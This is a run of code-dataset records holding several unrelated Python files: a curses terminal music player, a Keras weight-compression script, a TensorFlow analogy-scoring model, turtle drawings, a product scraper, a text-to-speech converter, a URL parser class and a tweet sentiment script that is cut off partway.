#\n# #\n# prefix - string to be trimmed. #\n#---------------------------------------------------------------#\ndef remove_prefix(text, prefix):\n \n if text.startswith(prefix):\n files.append(text[len(prefix):])\n\n#---------------------------------------------------------------#\n# Iterates through raw list of file paths and calls the #\n# function \"remove_prefix\" for string manipulation #\n#---------------------------------------------------------------#\ndef setList():\n \n for x in file:\n remove_prefix(x, prefix)\n\n#---------------------------------------------------------------#\n# This function gets the paths of all songs. It initializes #\n# a list that's used for playing audio files. #\n# Parameters: #\n# file - list of raw file paths #\n# #\n# wheight - height of subwindow #\n# #\n# playList - list that's used for playing audio files. #\n# #\n# page - current location in multi-dimensional list. #\n#---------------------------------------------------------------#\ndef getPlaylist(file, wheight, playList, page): \n filePlaceHolder = 0\n while(1):\n \n holdFile = []\n \n for x in range(0, wheight - 2): # Adds items to a hold list\n \n holdFile.append(file[filePlaceHolder]) \n filePlaceHolder += 1\n\n if filePlaceHolder == len(file):\n break\n \n playList.append(holdFile) # Adds hold list to another list\n page += 1\n\n if filePlaceHolder == len(file):\n break\n\n#---------------------------------------------------------------#\n# This function moves the file names of all imported songs #\n# into a multidimensional list. #\n# Parameters: #\n# #\n# files - list of file names with full path stripped off #\n# #\n# whight - height of subwindow #\n# #\n# multiList - multi-dememsional list containing song names by #\n# by page number. #\n# #\n# page - current location in multi-dimensional list. #\n#---------------------------------------------------------------#\n\ndef getList(files, wheight, multiList, page):\n filePlaceHolder = 0\n while(1):\n \n holdFile = [] # Adds items to a hold list\n \n for x in range(0, wheight - 2):\n \n holdFile.append(files[filePlaceHolder])\n filePlaceHolder += 1\n\n if filePlaceHolder == len(file):\n break\n \n multiList.append(holdFile) # Adds hold list to another list\n page += 1\n\n if filePlaceHolder == len(files):\n break\n\n#---------------------------------------------------------------#\n# This function clears the screen for the next page to be #\n# displayed. #\n# Parameters: #\n# #\n# window - The current window object used. #\n# #\n# multiList - multi-dememsional list containing song names by #\n# by page number. #\n# #\n# whight - height of subwindow #\n# #\n# wwidth - width of the subwindow #\n# #\n# row - The current location of the cursor. #\n#---------------------------------------------------------------#\ndef clearLine(window, multiList, wheight, wwidth, row):\n \n window.move(0,0)\n\n for i in range(0, wheight - 1):\n \n for x in range(0, wwidth - 1):\n \n window.addstr(\" \")\n\n row = row + 1\n window.move(row, 0)\n\n row = 0\n window.move(row,0)\n\n#---------------------------------------------------------------#\n# Function reprints selected row with highlighted text #\n# #\n# Parameters: #\n# row - The current location of the cursor. #\n# #\n# window - The current window object used. #\n# #\n# multiList - multi-dememsional list containing song names by #\n# by page number. #\n# #\n# page - current location in multi-dimensional list. #\n#---------------------------------------------------------------#\ndef rowSelection(row, window, multiList, page): \n\n text = multiList[page][row] # Line to reprint\n window.addnstr(text, len(text), curses.color_pair(1)) # Reprint line with highlight\n window.move(row, 0) # Moves cursor back to beginning of line\n\n#---------------------------------------------------------------#\n# Function reprints selected without highlighted text #\n# #\n# Parameters: #\n# row - The current location of the cursor. #\n# #\n# window - The current window object used. #\n# #\n# multiList - multi-dememsional list containing song names by #\n# by page number. #\n# #\n# page - current location in multi-dimensional list. #\n#---------------------------------------------------------------#\ndef rowDeselection(row, window, multiList, page):\n\n text = multiList[page][row] # Line to reprint\n window.addnstr(text, len(text)) # Reprint line with highlight\n window.move(row, 0) # Moves cursor back to beginning of line\n\n#---------------------------------------------------------------#\n# Function \"beginConsole\" creates an infinite loop. This loop #\n# is used for reading user input, namely the up/down/space/esc #\n# keys. #\n# #\n# Parameters: #\n# row - The current location of cursor. #\n# #\n# isRunning - Used to determine if a current processes is still #\n# running. #\n# #\n# window - the current window object used. #\n# #\n# whight - height of subwindow #\n# #\n# wwidth - width of the subwindow #\n# #\n# multiList - multi-dememsional list containing song names by #\n# by page number. #\n# #\n# page - current location in multi-dimensional list. #\n#---------------------------------------------------------------#\ndef beginConsole(row, isRunning, window, wheight, wwidth, multiList, page):\n \n getPlaylist(file, wheight, playList, page)\n \n processList = [''] # Initializing a list to hold active processes\n \n checkRow = row # Used for keeping track of whether song should be\n # stopped or new song should be played.\n\n while (1):\n \n c = window.getch() # Receive user input\n\n if c == curses.KEY_DOWN and row < len(multiList[page]) - 1: # Check to keep user from moving curser past options\n\n rowDeselection(row, window, multiList, page) \n row = row + 1 # New position of curser\n window.move(row, 0) # Move position of curser down\n rowSelection(row, window, multiList, page)\n window.refresh() # Refresh screen\n checkRow = row - 1 # Previous position of cursor\n\n elif c == curses.KEY_UP and row > 0: # Check to keep user from moving curser past options\n\n rowDeselection(row, window, multiList, page)\n row = row - 1\n window.move(row, 0)\n rowSelection(row, window, multiList, page)\n window.refresh()\n checkRow = row + 1\n\n elif c == curses.KEY_RIGHT and page < len(multiList) - 1:\n \n page = page + 1 # New page number\n row = 0\n clearLine(window, multiList, wheight, wwidth, row) # Clears screen\n printOptions(row, window, wheight, wwidth, page) # Prints next page to screen\n window.refresh()\n row = 0\n window.move(row, 0)\n \n elif c == curses.KEY_LEFT and page > 0:\n\n page = page - 1\n row = 0\n clearLine(window, multiList, wheight, wwidth, row)\n printOptions(row, window, wheight, wwidth, page)\n window.refresh()\n row = 0\n window.move(row, 0)\n \n elif c == ord(' '): # Condition for detection of spacebar\n\n if isRunning == True: # If a process is running kill the \n stopPlaying(processList) # process.\n isRunning = False\n\n if checkRow != row: # If curser is on a new line play song\n playSong(row, processList, page) # that is currently selected.\n isRunning = True\n\n else: # If no process is running play song\n playSong(row, processList, page)\n isRunning = True\n \n checkRow = row\n \n elif c == 27: # Check for escape key\n newProc = subprocess.Popen(['killall', 'afplay']) # Kill all processes\n break # Break from loop for termination \n # of program.\n#---------------------------------------------------------------#\n# Function prints options from list to screen for user #\n# selection. #\n# #\n# Parameters: #\n# row - The current location of cursor. #\n# #\n# window - the current window object used #\n# #\n# wheight - height of the subwindow. #\n# #\n# wwidth - width of the subwindow #\n# #\n# page - current location in multi-dimensional list. #\n#---------------------------------------------------------------# \ndef printOptions(row, window, wheight, wwidth, page):\n\n for x in range(0, len(multiList[page])):\n \n if x == len(multiList[page]) or row == wheight - 1: # Terminates printing if end of screen\n break # or end of list is reached\n \n if row == 0: # Highlights first option on screen\n window.addstr(multiList[page][x], curses.color_pair(1))\n row = row + 1\n window.move(row, 0)\n\n else:\n \n window.addstr(multiList[page][x])\n row = row + 1\n window.move(row, 0)\n\n fullMessage = \"Page: \" + str(page + 1) + space + message\n window.move(wheight - 2, 0) # Moves cursor to bottom of the screen\n window.addstr(fullMessage, curses.color_pair(2)) # Adds instructions with blue highlight\n\n for i in range(len(message), wwidth - 12): # adds color to remaining spaces of the line\n window.addstr(\" \", curses.color_pair(2))\n\n window.move(0, 0) # Move cursor to the top\n\n\n#---------------------------------------------------------------#\n# Do you really need to know what this function does? #\n#---------------------------------------------------------------#\ndef main(): \n \n page = 0 \n row = 0\n setList() \n stdscr = curses.initscr() # Begin curses window\n curses.noecho() #\n stdscr.idlok(True) # Use hardware line editing facilities.\n height,width = stdscr.getmaxyx() # Get width and height of window\n window = stdscr.subwin(height-1, width-1, 1, 1) # Create subscreen\n window.scrollok(True)\n stdscr.border(0) # Create border around subscreen.\n wheight, wwidth = window.getmaxyx()\n \n \n curses.curs_set(0) # Set cursor visibility to False\n window.keypad(1) # Enable special keys\n \n\n stdscr.nodelay(1) # getch() will be non-blocking.\n\n curses.start_color() # Enable color for highlighting\n curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_WHITE) # Color pair 1 for selection highlighting\n curses.init_pair(2, curses.COLOR_WHITE, curses.COLOR_BLUE) # Color pair 2 for instruction bar\n\n getList(files, wheight, multiList, page) # Get list of options to print on screen\n printOptions(row, window, wheight, wwidth, page) # Display options on screen\n\n row = 0\n window.move(row, 0) # Sets cursor position to (0,0)\n stdscr.refresh() # Refreshes screen to print changes\n beginConsole(row, isRunning, window, wheight, wwidth, multiList, page) # Begin user input\n\n curses.nocbreak() #\n stdscr.keypad(0) # End curses and terminate program\n curses.echo #\n curses.endwin() #\n\nif __name__ == '__main__':\n main()","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":19324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"509251454","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[23]:\n\n\nfrom keras.models import load_model\nimport sys\nimport numpy as np\nimport argparse as arg\nimport pandas as pd\nimport csv\nimport os\n\n\n# In[24]:\n\n\n######## Training ########\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten, Conv2D, SeparableConv2D, MaxPooling2D, Activation, BatchNormalization, Dropout\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.optimizers import Adam\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\n\nmodel = Sequential()\nmodel.add(Conv2D(filters=16, kernel_size=(5, 5), padding=\"same\", input_shape=(48,48,1), activation='relu'))\nmodel.add(BatchNormalization(axis=-1, momentum=0.5))\n\nmodel.add(SeparableConv2D(filters=32, kernel_size=(3, 3), padding=\"same\", activation='relu'))\nmodel.add(BatchNormalization(axis=-1, momentum=0.5))\nmodel.add(Dropout(0.2))\n\nmodel.add(SeparableConv2D(filters=64, kernel_size=(3, 3), padding=\"same\", activation='relu'))\nmodel.add(BatchNormalization(axis=-1, momentum=0.5))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.1))\n\nmodel.add(SeparableConv2D(filters=128, kernel_size=(3, 3), padding=\"same\", activation='relu'))\nmodel.add(BatchNormalization(axis=-1, momentum=0.5))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.1))\n\nmodel.add(SeparableConv2D(filters=128, kernel_size=(3, 3), padding=\"same\", activation='relu'))\nmodel.add(BatchNormalization(axis=-1, momentum=0.5))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\n\n# model.add(SeparableConv2D(filters=512, kernel_size=(3, 3), padding=\"same\", activation='relu'))\n# model.add(BatchNormalization(axis=-1, momentum=0.5))\n# model.add(MaxPooling2D(pool_size=(2,2)))\n# model.add(Dropout(0.2))\n\n\nmodel.add(Flatten())\nmodel.add(Dense(7, activation='softmax'))\n\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n\n# In[25]:\n\n\n# weight_filepath = \"small/140con16fiveto128_200_A0.598_L1.074_VA0.626_VL1.03.hdf5\"\nweight_filepath = \"less/16fiveto128_175_A0.663_L0.904_VA0.635_VL1.0.hdf5\"\nweight_filepath = \"less/16fiveto128_185_A0.666_L0.898_VA0.638_VL1.0.hdf5\"\nweight_filepath = \"less/16fiveto128_320_A0.673_L0.877_VA0.636_VL1.02.hdf5\"\nmodel.load_weights(weight_filepath)\n\n\n# In[26]:\n\n\nweights = model.get_weights()\nprint(len(weights))\ncompressed_weights = []\nfor i in range(len(weights)):\n if i > 27:\n compressed_weights.append(weights[i].astype(np.float16))\n else:\n compressed_weights.append(weights[i])\n\n\n# In[27]:\n\n\nnp.savez_compressed(\"part_compressed_w.npz\", compressed_w = np.array(compressed_weights))\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"hw8/compress.py","file_name":"compress.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"154475208","text":"import tensorflow as tf\nimport h5py\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\n# Import methods\nfrom ops import *\nfrom encoder import *\nfrom analogy_scoring_model import *\nfrom util import log\n\ndef check_path(path):\n if not os.path.exists(path):\n os.mkdir(path)\n\n# Method for creating input variable names\ndef create_input_var_names():\n\tinput_var_names = [\n\t\t\t\t\t'imgs',\n\t\t\t\t\t'ABCD',\n\t\t\t\t\t'not_D',]\n\treturn input_var_names\n\nclass Model(object):\n\n\tdef __init__(self, config, batch_ops, is_train=True):\n\n\t\t# Model name\n\t\tmodel_name = 'sub_batch_norm'\n\n\t\t# Model inputs\n\t\timgs = batch_ops['imgs']\n\t\tABCD = tf.cast(batch_ops['ABCD'], dtype=tf.int64)\n\t\tnot_D = tf.cast(batch_ops['not_D'], dtype=tf.int64)\n\n\t\t# Dimensions\n\t\tbatch_size = int(config.batch_size)\n\t\tN_foils = int(not_D.shape[1])\n\n\t\t# Get latent codes for all images\n\t\tA_latent, B_latent, C_latent, D_latent, all_foil_latent = encode_analogy_objs(imgs, ABCD, not_D)\n\t\tN_latent = int(A_latent.shape[1])\n\n\t\t# Normalization\n\t\t# Small constant (for avoiding division by zero)\n\t\teps = 1e-8\n\t\t# Scale and shift parameters\n\t\twith tf.variable_scope('norm_params', reuse=tf.AUTO_REUSE) as scope:\n\t\t\tscale = tf.get_variable('scale', N_latent, initializer=tf.ones_initializer())\n\t\t\tshift = tf.get_variable('shift', N_latent, initializer=tf.zeros_initializer())\n\t\t# Normalize over smaller sub-batches of 4\n\t\tN_sub_batches = int(batch_size / 4)\n\t\tA_batch_norm = []\n\t\tB_batch_norm = []\n\t\tC_batch_norm = []\n\t\tD_batch_norm = []\n\t\tfor b in range(N_sub_batches):\n\t\t\t# Extract sub-batch\n\t\t\tsub_batch_ind = np.arange(b * 4, (b+1) * 4)\n\t\t\tA_sub_batch = tf.gather(A_latent, sub_batch_ind, axis=0)\n\t\t\tB_sub_batch = tf.gather(B_latent, sub_batch_ind, axis=0)\n\t\t\tC_sub_batch = tf.gather(C_latent, sub_batch_ind, axis=0)\n\t\t\tD_sub_batch = tf.gather(D_latent, sub_batch_ind, axis=0)\n\t\t\t# Normalization parameters\n\t\t\tA_latent_mean, A_latent_var = tf.nn.moments(A_sub_batch, 0)\n\t\t\tA_latent_SD = tf.sqrt(A_latent_var + eps)\n\t\t\tB_latent_mean, B_latent_var = tf.nn.moments(B_sub_batch, 0)\n\t\t\tB_latent_SD = tf.sqrt(B_latent_var + eps)\n\t\t\tC_latent_mean, C_latent_var = tf.nn.moments(C_sub_batch, 0)\n\t\t\tC_latent_SD = tf.sqrt(C_latent_var + eps)\n\t\t\tD_latent_mean, D_latent_var = tf.nn.moments(D_sub_batch, 0)\n\t\t\tD_latent_SD = tf.sqrt(D_latent_var + eps)\n\t\t\t# Normalize\n\t\t\tA_sub_batch_norm = (((A_sub_batch - A_latent_mean) / A_latent_SD) * scale) + shift\n\t\t\tB_sub_batch_norm = (((B_sub_batch - B_latent_mean) / B_latent_SD) * scale) + shift\n\t\t\tC_sub_batch_norm = (((C_sub_batch - C_latent_mean) / C_latent_SD) * scale) + shift\n\t\t\tD_sub_batch_norm = (((D_sub_batch - D_latent_mean) / D_latent_SD) * scale) + shift\n\t\t\t# Add to list\n\t\t\tA_batch_norm.append(A_sub_batch_norm)\n\t\t\tB_batch_norm.append(B_sub_batch_norm)\n\t\t\tC_batch_norm.append(C_sub_batch_norm)\n\t\t\tD_batch_norm.append(D_sub_batch_norm)\n\t\t# Concatenate\n\t\tA_batch_norm = tf.concat(A_batch_norm, axis=0)\n\t\tB_batch_norm = tf.concat(B_batch_norm, axis=0)\n\t\tC_batch_norm = tf.concat(C_batch_norm, axis=0)\n\t\tD_batch_norm = tf.concat(D_batch_norm, axis=0)\n\n\t\t# [A, B, C, D] -> LSTM\n\t\tlog.info('[A,B,C,D] -> LSTM...')\n\t\tD_score = scoring_model(A_batch_norm, B_batch_norm, C_batch_norm, D_batch_norm)\n\n\t\t# [A, B, C, foils] -> LSTM\n\t\tlog.info('[A,B,C,foils] -> LSTM...')\n\t\tall_foil_score = []\n\t\tfor foil in range(N_foils):\n\t\t\t# Extract latent rep for this foil\n\t\t\tthis_foil_latent = all_foil_latent[:,foil,:]\n\t\t\t# Normalization\n\t\t\tfoil_batch_norm = []\n\t\t\tfor b in range(N_sub_batches):\n\t\t\t\t# Extract sub-batch\n\t\t\t\tsub_batch_ind = np.arange(b * 4, (b+1) * 4)\n\t\t\t\tfoil_sub_batch = tf.gather(this_foil_latent, sub_batch_ind, axis=0)\n\t\t\t\t# Normalization parameters\n\t\t\t\tfoil_latent_mean, foil_latent_var = tf.nn.moments(foil_sub_batch, 0)\n\t\t\t\tfoil_latent_SD = tf.sqrt(foil_latent_var + eps)\n\t\t\t\t# Normalize\n\t\t\t\tfoil_sub_batch_norm = (((foil_sub_batch - foil_latent_mean) / foil_latent_SD) * scale) + shift\n\t\t\t\t# Add to list\n\t\t\t\tfoil_batch_norm.append(foil_sub_batch_norm)\n\t\t\t# Concatenate\n\t\t\tfoil_batch_norm = tf.concat(foil_batch_norm, axis=0)\n\t\t\t# Get score\n\t\t\tfoil_score = scoring_model(A_batch_norm, B_batch_norm, C_batch_norm, foil_batch_norm)\n\t\t\t# Accumulate foil scores\n\t\t\tall_foil_score.append(foil_score)\n\n\t\t# Concatenate all scores\n\t\tall_foil_score = tf.concat(all_foil_score, axis=1)\n\t\tall_scores = tf.concat([D_score, all_foil_score], axis=1)\n\t\tall_scores_softmax = tf.nn.softmax(all_scores)\n\n\t\t# Loss\n\t\tlog.info(\"Loss (cross-entropy over candidate scores)...\")\n\t\ttargets = tf.concat([tf.ones(D_score.shape), tf.zeros(all_foil_score.shape)], axis=1)\n\t\tself.train_loss, accuracy, correct_preds = build_cross_entropy_loss(all_scores, targets)\n\t\taccuracy = accuracy * 100.0\n\n\t\t# Model outputs\n\t\tself.all_out = {\n\t\t\t\t\t\t'accuracy': accuracy}\n","sub_path":"VAEC_dataset_and_models/models/model_sub_batch_norm.py","file_name":"model_sub_batch_norm.py","file_ext":"py","file_size_in_byte":4738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"59230036","text":"from math import tan,cos,sin\nfrom turtle import *\nspeed(10) \nwidth(5)\n\n\ndef triangle(n):\n for i in range(3):\n forward(n)\n left(120)\n forward(n)\n \ndef debut():\n forward(30)\n left(117)\n forward(35)\n right(180)\n forward(35)\n left(63)\n\ndef fin():\n left(90)\n forward(74)\n right(150)\n forward(85)\n right(119)\n forward(45)\n right(180)\n forward(45)\n left(50)\n forward(35)\n right(180)\n forward(35)\n left(123)\n forward(35)\n\ndef lesTriangle(m):\n n=40\n m = n+24\n t = 83\n for i in range(3):\n forward(n)\n triangle(n)\n left(90)\n forward(m)\n left(180)\n forward(m)\n left(90)\n forward(n)\n left(90)\n forward(t)\n left(180)\n forward(t)\n left(90)\n n = n+15\n m = n+40\n t = t+14\n if t > 97:\n n = n - 18.5\n t = t-35\n m = m-20\ndef ellipse(x1,y1,a,b):\n pencolor(\"blue\")\n width(5)\n t=0\n \n while t<3.14:\n xM=x1+a*cos(t)\n yM=y1+b*sin(t)\n goto(xM,yM-2)\n t=t+0.1\n forward(400)\n setheading(0)\ndef deux(m):\n debut()\n lesTriangle(m)\n fin()\n\ndef lesEllipse():\n x = -400\n y = 0\n for i in range(3):\n ellipse(x,y,200,100)\n x = x+400\n y = y+1\n\n\nlesEllipse()\nleft(180)\npenup()\nforward(1200)\nleft(180)\npendown()\nfor i in range(3):\n m=10\n deux(m)\n setheading(0)\n m = m+1\n\nright(180)\n\npenup()\nforward(365)\npendown()\n\ndef lesRectangle():\n begin_fill()\n color(\"blue\")\n def rectangle(l,L):\n \n begin_fill()\n color(\"blue\")\n for i in range(2):\n forward(l)\n left(90)\n forward(L)\n left(90)\n end_fill()\n rectangle(70,20)\n begin_fill()\n color(\"blue\")\n up()\n forward(70)\n left(90)\n forward(20)\n down()\n right(90)\n forward(20)\n left(90)\n forward(20)\n left(90)\n forward(20+70+20)\n left(90)\n forward(20)\n left(90)\n forward(20)\n\n end_fill()\nlesRectangle()\nup()\nforward(400)\nright(90)\nforward(23)\nleft(90)\ndown()\n\nlesRectangle()\n\n\ndone()","sub_path":"pond.py","file_name":"pond.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"647254168","text":"import requests\nimport json\nfrom bs4 import BeautifulSoup\n\n\ndef fetch_products():\n response = requests.get(\"https://sokoglam.com/products.json?limit=500\")\n product_json = response.json()\n with open(\"all_products.json\", \"w\") as write_file:\n json.dump(product_json, write_file)\n\n\ndef parse_titles():\n with open(\"all_products.json\", \"r\") as read_file:\n data = json.load(read_file)\n titles = []\n for product in data[\"products\"]:\n titles.append(product[\"title\"])\n return titles\n\n\ndef write_titles():\n t = open(\"all_titles.txt\", \"w\")\n data = parse_titles()\n data_str = \"\\n \"\n data_str = data_str.join(data)\n t.write(data_str)\n t.close()\n\n\ndef parse_descriptions():\n with open(\"all_products.json\", \"r\") as read_file:\n data = json.load(read_file)\n descriptions = []\n for product in data[\"products\"]:\n body_html = product[\"body_html\"][\n :300\n ] # trimmed to make this more manageable\n soup = BeautifulSoup(body_html)\n descriptions.append(soup.get_text())\n # we still get some tags of the variety...\n\n return descriptions\n\n\ndef write_descriptions():\n t = open(\"all_descriptions.txt\", \"w\")\n data = parse_descriptions()\n data_str = \"\\n \"\n data_str = data_str.join(data)\n t.write(data_str)\n t.close()\n\n\nwrite_descriptions()\n\n","sub_path":"descriptions/fetch_skincare.py","file_name":"fetch_skincare.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"302545405","text":"from tkinter import*\r\nfrom gtts import gTTS\r\nimport os\r\nroot=Tk()\r\nroot.title(\"Text to sound converter\")\r\nroot.geometry(\"500x200\")\r\nroot.iconbitmap(\"python_icon.ico\")\r\ndef convert ():\r\n fh = open(\"Test.txt\",\"r\")#name of the txt file on your system\r\n myText =fh.read().replace(\"\\n\",\"\")\r\n language ='en'\r\n output = gTTS(text=myText,lang = language,slow=True)\r\n output.save(\"convertedoutput1.mp3\")#name of your Audio mp3 file after conversion\r\n fh.close()\r\n #os.system(\"startoutput.mp3\")\r\nconvet_button=Button(root,text=\"Convert\",font=(\"Helvetica\",18),command=convert)\r\nconvet_button.pack(pady=20)\r\nroot.mainloop()","sub_path":"convertingTextfile from_ inside the computer.py","file_name":"convertingTextfile from_ inside the computer.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"438609837","text":"# -*-coding:utf-8 -*\n\"\"\"Fonctions utilitaires\"\"\"\n\ndef yes_or_no(question):\n \"\"\"Permet de retourner true si l'utilisateur saisie yes et False si no\"\"\"\n reply = str(input(question+' (y/n): ')).lower().strip()\n if reply[0] == 'y':\n return True\n if reply[0] == 'n':\n return False\n else:\n return yes_or_no(\"Veuillez saisir \")\n","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"460672402","text":"import re\n\nclass ExtratorURL:\n def __init__(self, url):\n self.url = self.sanitiza_url(url)\n self.validar_url()\n\n def sanitiza_url(self, url):\n if type(url) == str:\n return url.strip()\n\n def validar_url(self):\n if not self.url:\n raise ValueError(\"A URL está vazia\")\n\n padrao_url = \"(http(s)?://)?(www.)?bytebank.com(.br)?/cambio\"\n padrao_url = re.compile(padrao_url)\n\n match = padrao_url.match(self.url)\n\n if not match:\n raise ValueError(f\"A URL: {self.url} não é valida.\")\n\n def get_url_base(self):\n indice_interrogacao = self.url.find(\"?\")\n url_base = self.url[:indice_interrogacao]\n return url_base\n\n def get_url_parametros(self):\n indice_interrogacao = self.url.find(\"?\")\n url_parametros = self.url[indice_interrogacao +1:]\n return url_parametros\n\n def get_valor_parametros(self, parametro_busca):\n indice_parametro = self.get_url_parametros().find(parametro_busca)\n indice_valor = indice_parametro + len(parametro_busca) +1\n indice_comercial = self.get_url_parametros().find(\"&\", indice_valor)\n \n if(indice_comercial == -1):\n valor = self.get_url_parametros()[indice_valor:]\n else:\n valor = self.get_url_parametros()[indice_valor:indice_comercial]\n return valor\n\n def __len__(self):\n return len(self.url)\n\n def __str__(self):\n return f\"URL: {self.url}\\nParâmetros: {self.get_url_parametros()}\\nURL Base: {self.get_url_base()}\"\n\n def __eq__(self, other):\n return self.url == other.url\n\nif __name__ == '__main__':\n newExtrator = ExtratorURL(\"bytebank.com/cambio?quantidade=100&moedaOrigem=real&moedaDestino=dolar\")\n valor_quantidade = newExtrator.get_valor_parametros(\"quantidade\")\n \n print(valor_quantidade)\n print(F\"Tamanho da URL: {len(newExtrator)}\")\n print(f\"{newExtrator}\")\n","sub_path":"strings/extrator_url.py","file_name":"extrator_url.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"338691067","text":"import re\r\nimport string\r\n\r\nimport nltk\r\nimport numpy\r\nimport pandas as pd\r\nfrom nltk.tokenize import word_tokenize\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.stem import PorterStemmer\r\nfrom collections import Counter\r\nfrom nltk.stem import WordNetLemmatizer\r\nfrom nltk.probability import FreqDist\r\nfrom textblob import TextBlob\r\nfrom matplotlib import pyplot as plt\r\nfrom wordcloud import WordCloud, STOPWORDS\r\n\r\ndata = pd.read_csv(\"HSBC_UK_ALL_TWEETS.csv\", encoding=\"ISO-8859-1\", engine='python')\r\n\r\nprint(data.columns)\r\n\r\n# set of alphabets\r\na = ord('a')\r\nalphabetset = [chr(i) for i in range(a, a + 26)]\r\n\r\n\r\ndef FilterCovidTweets(data):\r\n tweetsList = data['absolute_tidy_tweets']\r\n # covidTweets={}\r\n tweetList = []\r\n dateList = []\r\n for i in range(len(tweetsList)):\r\n tweet = tweetsList[i]\r\n if \"coronavirus\" in str(tweet).lower() or \"covid\" in str(tweet).lower() or \"covid-19\" in str(\r\n tweet).lower() or \"corona\" in str(tweet).lower():\r\n tweetList.append(tweet)\r\n dateList.append(data['DATE'][i])\r\n print(\"found corona covid-19 ... at \", tweet)\r\n covidDF = pd.DataFrame(list(zip(tweetsList, dateList)), columns=[\"TWEET\", \"DATE\"])\r\n return covidDF\r\n\r\n\r\ndef FilterBankTweets(data):\r\n tweetsList = data['absolute_tidy_tweets']\r\n tweetList = []\r\n dateList = []\r\n bankTerms = [\"bank\", \"recession\", \"economy\", \"transaction\", \"collapse\", \"fraud\", \"finance\", \"financial\", \"rate\",\r\n \"mortgage\", \"loan\", \"card\", \"tax\", \"interest\", \"rate\", \"credit\", \"payment\", \"customer\", \"retail\",\r\n \"amount\", \"deposit\",\r\n \"decline\", \"branch\", \"hsbc\", \"hsbc uk\", \"debit\", \"credit\", \"contact\", \"call\",\"hsbcuk\",\"one\",\"still\",\"app\", \"helpdesk\"]\r\n for i in range(len(tweetsList)):\r\n tweet = tweetsList[i]\r\n if (any(term in str(tweet) for term in bankTerms)):\r\n tweetList.append(tweet)\r\n dateList.append(data['DATE'][i])\r\n bankDF = pd.DataFrame(list(zip(tweetsList, dateList)), columns=[\"TWEET\", \"DATE\"])\r\n return bankDF\r\n\r\n\r\ndef ListToString(listName):\r\n listToStr = ' '.join([str(elem) for elem in listName])\r\n return listToStr\r\n\r\n\r\ndef StemWords(words):\r\n ps = PorterStemmer()\r\n words_after_stemming = []\r\n for w in words:\r\n words_after_stemming.append(ps.stem(w))\r\n return words_after_stemming\r\n\r\n\r\ndef CreateWordCloud(tweetWords):\r\n stopwords = set(STOPWORDS)\r\n\r\n # Create the wordcloud object\r\n # converting list of strings to a string\r\n\r\n # wordcloud = WordCloud(width=800, height=800,\r\n # background_color='white',\r\n # stopwords=stopwords,\r\n # min_font_size=10).generate(tweetWords)\r\n\r\n words = nltk.tokenize.word_tokenize(tweetWords)\r\n word_count_dict = Counter(str(word) for word in words)\r\n wordcloud = WordCloud(width=580, height=290, random_state=21, max_font_size=100,\r\n background_color='white', stopwords=garbage).generate_from_frequencies(word_count_dict)\r\n plt.figure(figsize=(5.7, 2.7))\r\n plt.imshow(wordcloud, interpolation=\"bilinear\")\r\n plt.axis('off')\r\n plt.tight_layout(pad=0)\r\n plt.show()\r\n\r\n # wordcloud = WordCloud(width=480, height=480, margin=0).generate(text)\r\n\r\n # Display the generated image:\r\n # plt.imshow(wordcloud, interpolation='bilinear')\r\n # plt.axis(\"off\")\r\n # plt.margins(x=0, y=0)\r\n # plt.show()\r\n\r\n\r\ndef GiveDay(timestamp):\r\n day_string = timestamp.day\r\n return day_string\r\n\r\n\r\ndef GetTweetSentiment(tweets, data):\r\n positiveList = []\r\n negativeList = []\r\n neutralList = []\r\n dateTimeList = pd.to_datetime(data[\"DATE\"].values).tolist()\r\n # print(dateTimeList)\r\n\r\n for tweet in tweets:\r\n analysis = TextBlob(str(tweet))\r\n if analysis.sentiment.polarity > 0:\r\n positiveList.append(1)\r\n negativeList.append(0)\r\n neutralList.append(0)\r\n elif analysis.sentiment.polarity < 0:\r\n negativeList.append(1)\r\n positiveList.append(0)\r\n neutralList.append(0)\r\n else:\r\n neutralList.append(1)\r\n positiveList.append(0)\r\n negativeList.append(0)\r\n\r\n # #Polarity_List stores polarity of tweets preserving the order\r\n\r\n df = pd.DataFrame(list(zip(dateTimeList, positiveList, negativeList, neutralList)),\r\n columns=[\"DateTime\", \"Positive\", \"Negative\", \"Neutral\"])\r\n df.set_index('DateTime')\r\n\r\n # print(df)\r\n df['Date'] = df[\"DateTime\"].apply(lambda df: pd.datetime.datetime(year=df.year, month=df.month, day=df.day))\r\n\r\n newDF = pd.DataFrame(list(zip(df['Date'], df['Positive'], df['Negative'], df['Neutral'])),\r\n columns=[\"Date\", \"POS\", \"NEG\", \"NEU\"])\r\n DailyTweets = newDF.set_index('Date').resample('D').sum()\r\n MonthlyTweets = newDF.set_index('Date').resample('M')[\"POS\", \"NEG\", \"NEU\"].sum()\r\n YearlyTweets = newDF.set_index('Date').resample('Y')[\"POS\", \"NEG\", 